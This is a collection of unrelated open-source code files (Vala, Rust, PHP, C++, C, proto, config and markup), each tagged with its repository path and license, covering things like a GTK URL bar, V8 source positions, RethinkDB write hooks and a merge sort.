OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ namespace Nuvola { public class URLBar: Gtk.Grid { public Drtgtk.Entry entry; public string? url { get {return entry.text;} set {entry.text = value;} } private Gtk.Button go_button; private Gtk.Button copy_button; private Gtk.Button close_button; public URLBar(string? url) { orientation = Gtk.Orientation.HORIZONTAL; hexpand = true; halign = Gtk.Align.FILL; margin_start = margin_end = 20; get_style_context().add_class("linked"); entry = new Drtgtk.Entry(url); entry.hexpand = true; entry.halign = Gtk.Align.FILL; entry.activate.connect(on_go_button_clicked); entry.escape.connect(on_close_button_clicked); entry.show(); add(entry); go_button = new Gtk.Button.with_label("Go"); go_button.clicked.connect(on_go_button_clicked); go_button.show(); add(go_button); copy_button = new Gtk.Button.from_icon_name("edit-copy-symbolic"); copy_button.clicked.connect(on_copy_button_clicked); copy_button.show(); add(copy_button); close_button = new Gtk.Button.from_icon_name("window-close-symbolic"); close_button.clicked.connect(on_close_button_clicked); close_button.show(); add(close_button); } ~URLBar() { go_button.clicked.disconnect(on_go_button_clicked); entry.activate.disconnect(on_go_button_clicked); entry.escape.disconnect(on_close_button_clicked); copy_button.clicked.disconnect(on_copy_button_clicked); close_button.clicked.disconnect(on_close_button_clicked); } public signal void response(bool accepted); private void on_go_button_clicked() { response(true); } private void on_copy_button_clicked() { entry.copy_to_clipboard(); } private void on_close_button_clicked() { response(false); } } } // namespace Nuvola
Vala
4
xcffl/nuvolaruntime
src/nuvolakit-runner/gui/URLBar.vala
[ "BSD-2-Clause" ]
import Types "Types"; /// Demo script types module { public type UserId = Types.UserId; public type VideoId = Types.VideoId; public type Command = { #reset : Types.TimeMode ; #putRewardTransfer : { sender : UserId ; receiver : UserId ; amount : Nat }; #createTestData : { users : [UserId] ; videos : [(UserId, VideoId)] }; #putSuperLike : { userId : UserId ; videoId : VideoId ; superLikes : Bool }; #putProfileFollow : { userId : UserId ; toFollow : UserId ; follows : Bool }; #assertVideoVirality : { videoId : VideoId ; isViral : Bool }; #assertVideoFeed : { userId : UserId ; limit : ?Nat ; videosPred : VideosPred }; }; public type VideosPred = { #containsAll : [VideoId] ; // order independent check. #equals : [VideoId] ; // order dependent check. }; public type Result = { #ok ; #err : Text }; public type TraceCommand = { command : Command ; result : Result ; }; public type Trace = { status : {#ok ; #err } ; trace : [TraceCommand] }; }
Modelica
4
gajendraks/cancan
backend/Demo.mo
[ "Apache-2.0" ]
#%RAML 1.0 Trait usage: Use this trait for resources whose response body is a single item responses: 200: body: application/json: type: <<typeName>> example: !include /examples/<<typeName>>.json
RAML
3
zeesh49/tutorials
raml/modularization/traits/hasResponseItem.raml
[ "MIT" ]
fn cplusplus_mode(x: isize) -> &'static isize { &x //~^ ERROR cannot return reference to function parameter `x` [E0515] } fn main() {}
Rust
2
Eric-Arellano/rust
src/test/ui/borrowck/borrowck-local-borrow-outlives-fn.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
locate port Fw.BufferGet at "Buffer/Buffer.fpp" locate port Fw.BufferSend at "Buffer/Buffer.fpp" locate port Fw.Cmd at "Cmd/Cmd.fpp" locate port Fw.CmdReg at "Cmd/Cmd.fpp" locate port Fw.CmdResponse at "Cmd/Cmd.fpp" locate port Fw.Com at "Com/Com.fpp" locate port Fw.Log at "Log/Log.fpp" locate port Fw.LogText at "Log/Log.fpp" locate port Fw.PrmGet at "Prm/Prm.fpp" locate port Fw.PrmSet at "Prm/Prm.fpp" locate port Fw.Time at "Time/Time.fpp" locate port Fw.Tlm at "Tlm/Tlm.fpp" locate port Fw.TlmGet at "Tlm/Tlm.fpp" locate type Fw.Buffer at "Buffer/Buffer.fpp" locate type Fw.CmdArgBuffer at "Cmd/Cmd.fpp" locate type Fw.CmdResponse at "Cmd/Cmd.fpp" locate type Fw.ComBuffer at "Com/Com.fpp" locate type Fw.DeserialStatus at "Types/Types.fpp" locate type Fw.Enabled at "Types/Types.fpp" locate type Fw.LogBuffer at "Log/Log.fpp" locate type Fw.LogSeverity at "Log/Log.fpp" locate type Fw.ParamBuffer at "Prm/Prm.fpp" locate type Fw.ParamValid at "Prm/Prm.fpp" locate type Fw.PolyType at "Types/Types.fpp" locate type Fw.SerialStatus at "Types/Types.fpp" locate type Fw.String at "Types/Types.fpp" locate type Fw.TextLogString at "Log/Log.fpp" locate type Fw.Time at "Time/Time.fpp" locate type Fw.TlmBuffer at "Tlm/Tlm.fpp"
FORTRAN
3
AlperenCetin0/fprime
Fw/locs.fpp
[ "Apache-2.0" ]
sequence&J JJ
PureBasic
0
pchandrasekaran1595/onnx
onnx/backend/test/data/node/test_sequence_insert_at_front/test_data_set_0/input_0.pb
[ "Apache-2.0" ]
#+TITLE: editor/snippets #+DATE: February 11, 2017 #+SINCE: v2.0 #+STARTUP: inlineimages * Table of Contents :TOC: - [[#description][Description]] - [[#module-flags][Module Flags]] - [[#plugins][Plugins]] - [[#hacks][Hacks]] - [[#prerequisites][Prerequisites]] - [[#features][Features]] - [[#configuration][Configuration]] - [[#disabling-the-built-in-snippets][Disabling the built-in snippets]] - [[#troubleshooting][Troubleshooting]] * Description This module adds snippets to Emacs, powered by yasnippet. ** Module Flags This module exposes no flags. ** Plugins + [[https://github.com/joaotavora/yasnippet][yasnippet]] + [[https://github.com/abo-abo/auto-yasnippet][auto-yasnippet]] + [[https://github.com/hlissner/doom-snippets][doom-snippets]] ** TODO Hacks * Prerequisites This module has no external dependencies. * TODO Features * Configuration ** Disabling the built-in snippets Don't want to use provided one? Then add this to your private module, #+BEGIN_SRC emacs-lisp ;; in ~/.doom.d/packages.el (package! doom-snippets :ignore t) ;; If you want to replace it with yasnippet's default snippets (package! yasnippet-snippets) #+END_SRC * TODO Troubleshooting
Org
4
leezu/doom-emacs
modules/editor/snippets/README.org
[ "MIT" ]
<link rel="import" href="../bower_components/polymer/polymer.html"> <script> (function () { 'use strict'; var ENTER_KEY = 13; var ESC_KEY = 27; Polymer({ is: 'td-input', extends: 'input', listeners: { 'keyup': '_keyupAction', 'keypress': '_keypressAction' }, _keypressAction: function(e, detail, sender) { // Listen for enter on keypress but esc on keyup, because // IE doesn't fire keyup for enter. if (e.keyCode === ENTER_KEY) { this.fire('td-input-commit'); } }, _keyupAction: function(e, detail, sender) { if (e.keyCode === ESC_KEY) { this.fire('td-input-cancel'); } } }); })(); </script>
HTML
4
dtelaroli/todomvc
examples/polymer/elements/td-input.html
[ "MIT" ]
0.5 dmetro 0.2 maytrig # number of units/tubes 10 # amplitude 0.3 # damp 0.2 # shake_max: amount of energy to add back into the system 0 # main resonant frequency 458 # first resonant frequency 600 # second resonant frequency 750 # period of time over which all sound is stopped 0.09 drip dup dup 3 8 10000 zrev drop 0.1 * +
SourcePawn
1
aleatoricforest/Sporth
examples/drip.sp
[ "MIT" ]
//my.ini file [sitemap] /home = default:index /info = default:info
INI
2
donsbot/hhvm
hphp/test/zend/good/ext/standard/tests/general_functions/bug49692.ini
[ "PHP-3.01", "Zend-2.0" ]
/** * This file is part of the Phalcon. * * (c) Phalcon Team <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Phalcon\Html\Helper; /** * Class Link */ class Link extends AbstractSeries { /** * Add an element to the list * * @param string $rel * @param string $href * * @return Link */ public function add(string rel, string href) -> <Link> { var attributes; let attributes = [ "rel" : rel, "href" : href ]; let this->store[] = [ "renderTag", [ this->getTag(), attributes, "/" ], this->indent() ]; return this; } /** * @return string */ protected function getTag() -> string { return "link"; } }
Zephir
4
chipco/cphalcon
phalcon/Html/Helper/Link.zep
[ "BSD-3-Clause" ]
include "php.grm" function main match [program] _ [program] end function
TXL
1
grammarware/slps
topics/grammars/php/cordy/PHP345/Txl/php.txl
[ "BSD-3-Clause" ]
// Copyright 2016 the V8 project authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef V8_CODEGEN_SOURCE_POSITION_H_ #define V8_CODEGEN_SOURCE_POSITION_H_ #include <iosfwd> #include "src/base/bit-field.h" #include "src/common/globals.h" #include "src/flags/flags.h" #include "src/handles/handles.h" namespace v8 { namespace internal { class Code; class OptimizedCompilationInfo; class Script; class SharedFunctionInfo; struct SourcePositionInfo; // SourcePosition stores // - is_external (1 bit true/false) // // - if is_external is true: // - external_line (20 bits, non-negative int) // - external_file_id (10 bits, non-negative int) // // - if is_external is false: // - script_offset (30 bit non-negative int or kNoSourcePosition) // // - In both cases, there is an inlining_id. // - inlining_id (16 bit non-negative int or kNotInlined). // // An "external" SourcePosition is one given by a file_id and a line, // suitable for embedding references to .cc or .tq files. // Otherwise, a SourcePosition contains an offset into a JavaScript // file. // // A defined inlining_id refers to positions in // OptimizedCompilationInfo::inlined_functions or // DeoptimizationData::InliningPositions, depending on the compilation stage. class SourcePosition final { public: explicit SourcePosition(int script_offset, int inlining_id = kNotInlined) : value_(0) { SetIsExternal(false); SetScriptOffset(script_offset); SetInliningId(inlining_id); } // External SourcePositions should use the following method to construct // SourcePositions to avoid confusion. static SourcePosition External(int line, int file_id) { return SourcePosition(line, file_id, kNotInlined); } static SourcePosition Unknown() { return SourcePosition(kNoSourcePosition); } bool IsKnown() const { if (IsExternal()) return true; return ScriptOffset() != kNoSourcePosition || InliningId() != kNotInlined; } bool isInlined() const { if (IsExternal()) return false; return InliningId() != kNotInlined; } bool IsExternal() const { return IsExternalField::decode(value_); } bool IsJavaScript() const { return !IsExternal(); } int ExternalLine() const { DCHECK(IsExternal()); return ExternalLineField::decode(value_); } int ExternalFileId() const { DCHECK(IsExternal()); return ExternalFileIdField::decode(value_); } // Assumes that the code object is optimized std::vector<SourcePositionInfo> InliningStack(Handle<Code> code) const; std::vector<SourcePositionInfo> InliningStack( OptimizedCompilationInfo* cinfo) const; void Print(std::ostream& out, Code code) const; void PrintJson(std::ostream& out) const; int ScriptOffset() const { DCHECK(IsJavaScript()); return ScriptOffsetField::decode(value_) - 1; } int InliningId() const { return InliningIdField::decode(value_) - 1; } void SetIsExternal(bool external) { value_ = IsExternalField::update(value_, external); } void SetExternalLine(int line) { DCHECK(IsExternal()); DCHECK(line <= ExternalLineField::kMax - 1); value_ = ExternalLineField::update(value_, line); } void SetExternalFileId(int file_id) { DCHECK(IsExternal()); DCHECK(file_id <= ExternalFileIdField::kMax - 1); value_ = ExternalFileIdField::update(value_, file_id); } void SetScriptOffset(int script_offset) { DCHECK(IsJavaScript()); DCHECK(script_offset <= ScriptOffsetField::kMax - 2); DCHECK_GE(script_offset, kNoSourcePosition); value_ = ScriptOffsetField::update(value_, script_offset + 1); } void SetInliningId(int inlining_id) { DCHECK(inlining_id <= InliningIdField::kMax - 2); DCHECK_GE(inlining_id, kNotInlined); value_ = InliningIdField::update(value_, inlining_id + 1); } static const int kNotInlined = -1; STATIC_ASSERT(kNoSourcePosition == -1); int64_t raw() const { return static_cast<int64_t>(value_); } static SourcePosition FromRaw(int64_t raw) { SourcePosition position = Unknown(); DCHECK_GE(raw, 0); position.value_ = static_cast<uint64_t>(raw); return position; } private: // Used by SourcePosition::External(line, file_id). SourcePosition(int line, int file_id, int inlining_id) : value_(0) { SetIsExternal(true); SetExternalLine(line); SetExternalFileId(file_id); SetInliningId(inlining_id); } void Print(std::ostream& out, SharedFunctionInfo function) const; using IsExternalField = base::BitField64<bool, 0, 1>; // The two below are only used if IsExternal() is true. using ExternalLineField = base::BitField64<int, 1, 20>; using ExternalFileIdField = base::BitField64<int, 21, 10>; // ScriptOffsetField is only used if IsExternal() is false. using ScriptOffsetField = base::BitField64<int, 1, 30>; // InliningId is in the high bits for better compression in // SourcePositionTable. using InliningIdField = base::BitField64<int, 31, 16>; // Leaving the highest bit untouched to allow for signed conversion. uint64_t value_; }; inline bool operator==(const SourcePosition& lhs, const SourcePosition& rhs) { return lhs.raw() == rhs.raw(); } inline bool operator!=(const SourcePosition& lhs, const SourcePosition& rhs) { return !(lhs == rhs); } struct InliningPosition { // position of the inlined call SourcePosition position = SourcePosition::Unknown(); // references position in DeoptimizationData::literals() int inlined_function_id; }; struct SourcePositionInfo { SourcePositionInfo(SourcePosition pos, Handle<SharedFunctionInfo> f); SourcePosition position; Handle<SharedFunctionInfo> shared; Handle<Script> script; int line = -1; int column = -1; }; std::ostream& operator<<(std::ostream& out, const SourcePosition& pos); std::ostream& operator<<(std::ostream& out, const SourcePositionInfo& pos); std::ostream& operator<<(std::ostream& out, const std::vector<SourcePositionInfo>& stack); } // namespace internal } // namespace v8 #endif // V8_CODEGEN_SOURCE_POSITION_H_
C
5
EXHades/v8
src/codegen/source-position.h
[ "BSD-3-Clause" ]
version https://git-lfs.github.com/spec/v1 oid sha256:b2dcb5e3f476f7408242ab47bca6db795d5847021440a5f904cc4bfa04df7f44 size 576
Nit
0
JGCRI/lds
indata/WaterFootprint/Report47-App-IV-RasterMaps/Olives/info/arc0006.nit
[ "BSD-3-Clause-LBNL" ]
<section class="live live--<%= @episode.podcast.slug %> js-live <%= status_class(@episode) %>"> <div class="live-content"> <div class="live-info"> <header class="live-info-header"> <h2 class="live-info-header-show"> <%= EpisodeView.podcast_name_and_number(@episode) %> </h2> <h1 class="live-info-header-title js-title"><%= @episode.title %></h1> </header> <div class="live-info-more"> <% participants = EpisodeView.participants(@episode) %> <div class="live-info-guests live-info-guests--<%= length(participants) %>"> <%= for person <- participants do %> <article class="live-info-guests-item"> <%= link(to: PersonView.profile_path(person), title: "More Info", target: "_blank") do %> <%= SharedHelpers.lazy_image(PersonView.avatar_url(person), String.at(person.name, 0), class: "live-info-guests-item-image", width: 150, height: 150) %> <h1 class="live-info-guests-item-name"><%= person.name %></h1> <% end %> </article> <% end %> </div> <div class="live-info-cta"> <%= if @podcast.slug == "gotime" do %> <p>Join the discussion in the Gophers <%= link(raw("#gotimefm&nbsp;Slack&nbsp;channel"), to: "https://gophers.slack.com/messages/gotimefm") %></p> <% else %> <p>Join the discussion in our <%= link(raw("##{slack_channel(@podcast)}&nbsp;Slack&nbsp;channel"), to: Routes.page_path(@conn, :community)) %></p> <p><small>Not a member yet? <a href="<%= Routes.page_path(@conn, :community) %>" title="">changelog.com/community</a></small></p> <% end %> </div> </div> </div> </div> </section>
HTML+EEX
4
gustavoarmoa/changelog.com
lib/changelog_web/templates/live/show.html.eex
[ "MIT" ]
<svg version="1.1" class="ionicon-table-status" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="512px" height="512px" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"> <g> <circle class="dot" cx="256" cy="256" r="64"/> <g > <path class="inner-ring" d="M144,256c0-36.9,18.553-69.208,46.314-87.034l-23.141-24.512c-6.26,4.608-12.18,9.833-17.684,15.663 C125.314,185.729,112,219.781,112,256c0,36.219,13.314,70.271,37.49,95.883c5.504,5.829,11.424,11.055,17.684,15.662 l23.141-24.511C162.553,325.208,144,292.9,144,256z"/> <path class="inner-ring" d="M368,256c0,36.9-18.553,69.208-46.314,87.034l23.141,24.511c6.26-4.607,12.18-9.833,17.684-15.662 C386.686,326.271,400,292.219,400,256c0-36.219-13.314-70.271-37.49-95.882c-5.504-5.83-11.424-11.055-17.684-15.663 l-23.141,24.512C349.447,186.792,368,219.1,368,256z"/> <path class="outer-ring" d="M64,256c0-55.578,25.251-104.907,64.263-135.817L105.433,96c-5.999,5-11.739,10.396-17.197,16.178 c-17.622,18.669-31.462,40.417-41.134,64.641C37.081,201.917,32,228.556,32,256c0,27.443,5.081,54.084,15.102,79.181 c9.672,24.226,23.512,45.973,41.134,64.642c5.458,5.781,11.198,11.177,17.197,16.178l22.829-24.183 C89.251,360.907,64,311.578,64,256z"/> <path class="outer-ring" d="M448,256c0,55.578-25.251,104.907-64.262,135.817l22.828,23.848c6-5.001,11.74-10.062,17.198-15.843 c17.622-18.669,31.462-40.416,41.134-64.642C474.918,310.084,480,283.443,480,256c0-27.444-5.082-54.083-15.102-79.181 c-9.672-24.225-23.512-45.972-41.134-64.641C418.307,106.396,412.566,101,406.566,96l-22.829,24.183 C422.749,151.093,448,200.422,448,256z"/> </g> </g> </svg>
Handlebars
2
zadcha/rethinkdb
admin/static/handlebars/table_status_indicator.hbs
[ "Apache-2.0" ]
<VirtualHost *:80> ServerAdmin [email protected] DocumentRoot /var/www/airtime/public <Directory /var/www/airtime/public> DirectoryIndex index.php AllowOverride all Order allow,deny Allow from all </Directory> </VirtualHost>
ApacheConf
3
krattai/AEBL
interfaces/ATS_VM/dev_tools/fabric/airtime.vhost
[ "BSD-2-Clause" ]
--TEST-- Error case: class constant as an encapsed containing a variable --FILE-- <?php class myclass { const myConst = "$myVar"; } ?> --EXPECTF-- Fatal error: Constant expression contains invalid operations in %s on line %d
PHP
3
thiagooak/php-src
tests/classes/constants_error_005.phpt
[ "PHP-3.01" ]
rly foo isa Bar shh 1 wow
Dogescript
0
PinkDiamond1/dogescript
test/language-spec/operators/isa/control-flow/source.djs
[ "MIT" ]
// Copyright 2010-2015 RethinkDB, all rights reserved. #include "rdb_protocol/terms/write_hook.hpp" #include <string> #include "clustering/administration/admin_op_exc.hpp" #include "containers/archive/string_stream.hpp" #include "rdb_protocol/btree.hpp" #include "rdb_protocol/error.hpp" #include "rdb_protocol/func.hpp" #include "rdb_protocol/op.hpp" #include "rdb_protocol/real_table.hpp" #include "rdb_protocol/minidriver.hpp" #include "rdb_protocol/term_walker.hpp" #include "rdb_protocol/terms/terms.hpp" std::string format_write_hook_query(const write_hook_config_t &config) { std::string ret = "setWriteHook("; ret += config.func.compile_wire_func()->print_js_function(); ret += ")"; return ret; } namespace ql { class set_write_hook_term_t : public op_term_t { public: set_write_hook_term_t(compile_env_t *env, const raw_term_t &term) : op_term_t(env, term, argspec_t(2)) { } deterministic_t is_deterministic() const final { return deterministic_t::no(); } virtual scoped_ptr_t<val_t> eval_impl( scope_env_t *env, args_t *args, eval_flags_t) const { counted_t<table_t> table = args->arg(env, 0)->as_table(); bool existed = false; admin_err_t error; datum_t write_hook; if (env->env->reql_cluster_interface()->get_write_hook( env->env->get_user_context(), table->db, name_string_t::guarantee_valid(table->name.c_str()), env->env->interruptor, &write_hook, &error)) { if (write_hook.has() && write_hook.get_type() != datum_t::type_t::R_NULL) { existed = true; } } /* Parse the write_hook configuration */ optional<write_hook_config_t> config; datum_string_t message("deleted"); scoped_ptr_t<val_t> v = args->arg(env, 1); // RSI: Old reql versions hanging around, being unused, is pretty bad. // RSI: Something about write hooks not being specified vs. being specified as "null" in certain API's was weird. // We ignore the write_hook's old `reql_version` and make the new version // just be `reql_version_t::LATEST`; but in the future we may have // to do some conversions for compatibility. if (v->get_type().is_convertible(val_t::type_t::DATUM)) { datum_t d = v->as_datum(); if (d.get_type() == datum_t::R_BINARY) { ql::wire_func_t func; datum_string_t str = d.as_binary(); size_t sz = str.size(); size_t prefix_sz = strlen(write_hook_blob_prefix); const char *data = str.data(); bool bad_prefix = (sz < prefix_sz); for (size_t i = 0; !bad_prefix && i < prefix_sz; ++i) { bad_prefix |= (data[i] != write_hook_blob_prefix[i]); } rcheck(!bad_prefix, base_exc_t::LOGIC, "Cannot create a write hook except from a reql_write_hook_function" " returned from `get_write_hook`."); string_read_stream_t rs(str.to_std(), prefix_sz); deserialize<cluster_version_t::LATEST_DISK>(&rs, &func); config.set(write_hook_config_t(func, reql_version_t::LATEST)); goto config_specified_with_value; } else if (d.get_type() == datum_t::R_NULL) { goto config_specified_without_value; } } // This way it will complain about it not being a function. config.set(write_hook_config_t(ql::wire_func_t(v->as_func()), reql_version_t::LATEST)); config_specified_with_value: config->func.compile_wire_func()->assert_deterministic( constant_now_t::no, "Write hook functions must be deterministic."); { optional<size_t> arity = config->func.compile_wire_func()->arity(); rcheck(static_cast<bool>(arity) && arity.get() == 3, base_exc_t::LOGIC, strprintf("Write hook functions must expect 3 arguments.")); } message = existed ? datum_string_t("replaced") : datum_string_t("created"); config_specified_without_value: try { admin_err_t err; if (!env->env->reql_cluster_interface()->set_write_hook( env->env->get_user_context(), table->db, name_string_t::guarantee_valid(table->name.c_str()), config, env->env->interruptor, &err)) { REQL_RETHROW(err); } } catch (auth::permission_error_t const &permission_error) { rfail(ql::base_exc_t::PERMISSION_ERROR, "%s", permission_error.what()); } ql::datum_object_builder_t res; res.overwrite(message, datum_t(1.0)); return new_val(std::move(res).to_datum()); } virtual const char *name() const { return "set_write_hook"; } }; class get_write_hook_term_t : public op_term_t { public: get_write_hook_term_t(compile_env_t *env, const raw_term_t &term) : op_term_t(env, term, argspec_t(1)) { } deterministic_t is_deterministic() const final { return deterministic_t::no(); } virtual scoped_ptr_t<val_t> eval_impl(scope_env_t *env, args_t *args, eval_flags_t) const { counted_t<table_t> table = args->arg(env, 0)->as_table(); datum_t write_hook; try { admin_err_t error; if (!env->env->reql_cluster_interface()->get_write_hook( env->env->get_user_context(), table->db, name_string_t::guarantee_valid(table->name.c_str()), env->env->interruptor, &write_hook, &error)) { REQL_RETHROW(error); } } catch (auth::permission_error_t const &permission_error) { rfail(ql::base_exc_t::PERMISSION_ERROR, "%s", permission_error.what()); } return new_val(std::move(write_hook)); } virtual const char *name() const { return "get_write_hook"; } }; counted_t<term_t> make_set_write_hook_term( compile_env_t *env, const raw_term_t &term) { return make_counted<set_write_hook_term_t>(env, term); } counted_t<term_t> make_get_write_hook_term( compile_env_t *env, const raw_term_t &term) { return make_counted<get_write_hook_term_t>(env, term); } } // namespace ql
C++
4
zadcha/rethinkdb
src/rdb_protocol/terms/write_hook.cc
[ "Apache-2.0" ]
{ "Version" : 0.2, "ModuleName" : "Writer", "Options" : { "Warnings" : "All", "PreprocessorDefinitions" : [ "IMPORT_STATIC=\"\"" ], "IncludeDirs" : [ "$(ECERE_SDK_SRC)/ecere/src/gfx/drivers/gl3", "$(ECERE_SDK_SRC)/ecere/src/gfx/newFonts/cc", "$(ECERE_SDK_SRC)/butterbur/src/imagesAndText", "$(ECERE_SDK_SRC)/deps/libtess" ], "TargetType" : "Executable", "TargetFileName" : "Writer", "Libraries" : [ "ecere" ] }, "Configurations" : [ { "Name" : "Debug", "Options" : { "Debug" : true, "Optimization" : "None", "PreprocessorDefinitions" : [ "_DEBUG" ], "FastMath" : false } }, { "Name" : "Release", "Options" : { "Debug" : false, "Optimization" : "Speed", "FastMath" : true } } ], "Files" : [ { "Folder" : "HTMLView", "Files" : [ "$(ECERE_SDK_SRC)/extras/html/htmlParser.ec", "$(ECERE_SDK_SRC)/extras/html/HTMLView.ec", "$(ECERE_SDK_SRC)/extras/html/lines.ec", "$(ECERE_SDK_SRC)/extras/html/tables.ec" ] }, "Writer.ec", "$(ECERE_SDK_SRC)/ecere/src/gfx/newFonts/cc/ccstr.c", "RichEdit.ec", "ewd.ec" ], "ResourcesPath" : "", "Resources" : [ ] }
Ecere Projects
3
mingodad/ecere-sdk
samples/guiAndGfx/EcereOffice/Writer/Writer.epj
[ "BSD-3-Clause" ]
// Copyright 2019 gRPC authors. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // 语法版本声明,必须放在非注释的第一行 // Syntax version declaration. Must be placed on the first line of non-commentary. syntax = "proto3"; // The document of proto3: https://developers.google.com/protocol-buffers/docs/proto3 // 包名定义, Python中使用时可以省略不写 // Package name definition, which can be omitted in Python. package demo; /* `message`是用来定义传输的数据的格式的, 等号后面的是字段编号 消息定义中的每个字段都有唯一的编号 总体格式类似于Python中定义一个类或者Golang中定义一个结构体 */ /* `message` is used to define the structure of the data to be transmitted, after the equal sign is the field number. Each field in the message definition has a unique number. The overall format is similar to defining a class in Python or a structure in Golang. */ message Request { int64 client_id = 1; string request_data = 2; } message Response { int64 server_id = 1; string response_data = 2; } // `service` 是用来给gRPC服务定义方法的, 格式固定, 类似于Golang中定义一个接口 // `service` is used to define methods for gRPC services in a fixed format, similar to defining //an interface in Golang service GRPCDemo { // 一元模式(在一次调用中, 客户端只能向服务器传输一次请求数据, 服务器也只能返回一次响应) // unary-unary(In a single call, the client can only send request once, and the server can // only respond once.) rpc SimpleMethod (Request) returns (Response); // 客户端流模式(在一次调用中, 客户端可以多次向服务器传输数据, 但是服务器只能返回一次响应) // stream-unary (In a single call, the client can transfer data to the server several times, // but the server can only return a response once.) rpc ClientStreamingMethod (stream Request) returns (Response); // 服务端流模式(在一次调用中, 客户端只能一次向服务器传输数据, 但是服务器可以多次返回响应) // unary-stream (In a single call, the client can only transmit data to the server at one time, // but the server can return the response many times.) rpc ServerStreamingMethod (Request) returns (stream Response); // 双向流模式 (在一次调用中, 客户端和服务器都可以向对方多次收发数据) // stream-stream (In a single call, both client and server can send and receive data // to each other multiple times.) rpc BidirectionalStreamingMethod (stream Request) returns (stream Response); }
Protocol Buffer
4
mpminardi/grpc
examples/python/data_transmission/demo.proto
[ "Apache-2.0" ]
Jesper Cockx's test case: \texttt{-} \begin{code} postulate A : Set \end{code}
Literate Agda
2
cruhland/agda
test/interaction/Token-highlighting-literate.lagda
[ "MIT" ]
.graphiql-explorer-root { font-size: 12px; text-overflow: ellipsis; overflow: unset; white-space: nowrap; margin: 0; padding: 8px; font-family: Consolas, Inconsolata, 'Droid Sans Mono', Monaco, monospace; } .graphiql-explorer-abstractfields-label { color: #ca9800; padding-left: 5px; } .graphiql-explorer-abstractargs-label { color: #8b2bb9; padding-left: 5px; } .graphiql-explorer-fieldname { color: rgb(31, 97, 160); padding-left: 5px; } .graphiql-explorer-node { margin-top: 5px; } .graphiql-explorer-args-wrapper { margin-top: 5px; } .explorerGraphiqlSeparator { height: 100%; right: -5px; position: absolute; top: 0; width: 10px; z-index: 10; } .explorerCursorResize { cursor: col-resize; } .gqlexplorer { position: relative; }
CSS
2
gh-oss-contributor/graphql-engine-1
console/src/components/Services/ApiExplorer/OneGraphExplorer/OneGraphExplorer.css
[ "Apache-2.0", "MIT" ]
// // regression test for #8005 macro_rules! test { () => { fn foo() -> i32 { 1; } } } //~^ ERROR mismatched types fn no_return() -> i32 {} //~ ERROR mismatched types fn bar(x: u32) -> u32 { //~ ERROR mismatched types x * 2; } fn baz(x: u64) -> u32 { //~ ERROR mismatched types x * 2; } fn main() { test!(); }
Rust
2
Eric-Arellano/rust
src/test/ui/liveness/liveness-return-last-stmt-semi.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
--TEST-- Modifying a readonly property --FILE-- <?php class Test { readonly public int $prop; readonly public array $prop2; public function __construct() { // Initializing assignments. $this->prop = 1; $this->prop2 = []; } } function byRef(&$ref) {} $test = new Test; var_dump($test->prop); // Read. try { $test->prop = 2; } catch (Error $e) { echo $e->getMessage(), "\n"; } try { $test->prop += 1; } catch (Error $e) { echo $e->getMessage(), "\n"; } try { $test->prop++; } catch (Error $e) { echo $e->getMessage(), "\n"; } try { ++$test->prop; } catch (Error $e) { echo $e->getMessage(), "\n"; } try { $ref =& $test->prop; } catch (Error $e) { echo $e->getMessage(), "\n"; } try { $test->prop =& $ref; } catch (Error $e) { echo $e->getMessage(), "\n"; } try { byRef($test->prop); } catch (Error $e) { echo $e->getMessage(), "\n"; } var_dump($test->prop2); // Read. try { $test->prop2[] = 1; } catch (Error $e) { echo $e->getMessage(), "\n"; } try { $test->prop2[0][] = 1; } catch (Error $e) { echo $e->getMessage(), "\n"; } ?> --EXPECT-- int(1) Cannot modify readonly property Test::$prop Cannot modify readonly property Test::$prop Cannot modify readonly property Test::$prop Cannot modify readonly property Test::$prop Cannot modify readonly property Test::$prop Cannot modify readonly property Test::$prop Cannot modify readonly property Test::$prop array(0) { } Cannot modify readonly property Test::$prop2 Cannot modify readonly property Test::$prop2
PHP
4
NathanFreeman/php-src
Zend/tests/readonly_props/readonly_modification.phpt
[ "PHP-3.01" ]
pub main coginit(0, @entry, 0) dat org 0 entry _func rdlong outa, objptr wrlong arg01, objptr _func_ret ret objptr long @@@objmem COG_BSS_START fit 496 objmem long 0[1] org COG_BSS_START arg01 res 1 fit 496
Parrot Assembly
2
archivest/spin2cpp
Test/Expect/stest108.pasm
[ "MIT" ]
#include <stdio.h> #include <stdlib.h> #include <stdbool.h> #include <string.h> void dump(int *arr, int size) { int idx; for (idx = 0; idx < size; idx++) printf("%08d\n", arr[idx]); } void __merge(int *arr, int p, int q, int r) { int *tmp; int i, j, k; tmp = (int*)malloc((r - p + 1) * sizeof(int)); if (!tmp) abort(); for (i = p, j = q + 1, k = 0; i <= q && j <= r;) { if (arr[i] <= arr[j]) tmp[k++] = arr[i++]; else tmp[k++] = arr[j++]; } if (i == q + 1) { for (; j <= r;) tmp[k++] = arr[j++]; } else { for (; i <= q;) tmp[k++] = arr[i++]; } memcpy(arr + p, tmp, (r - p + 1) * sizeof(int)); free(tmp); } void __merge_sort(int *arr, int p, int r) { int q; if (p >= r) return; q = (p + r) / 2; __merge_sort(arr, p, q); __merge_sort(arr, q + 1, r); __merge(arr, p, q, r); } void merge_sort(int *arr, int size) { __merge_sort(arr, 0, size - 1); } void merge_verify() { int test[10] = {5, 8, 9, 23, 67, 1, 3, 7, 31, 56}; __merge(test, 0, 4, 9); dump(test, 10); } void merge_sort_test() { int test[10] = {5, 8, 9, 23, 67, 1, 3, 7, 31, 56}; merge_sort(test, 10); dump(test, 10); } int main() { //merge_verify(); merge_sort_test(); return 0; }
C
5
shipan3452/algo
c-cpp/12_sorts/merge_sort.c
[ "Apache-2.0" ]
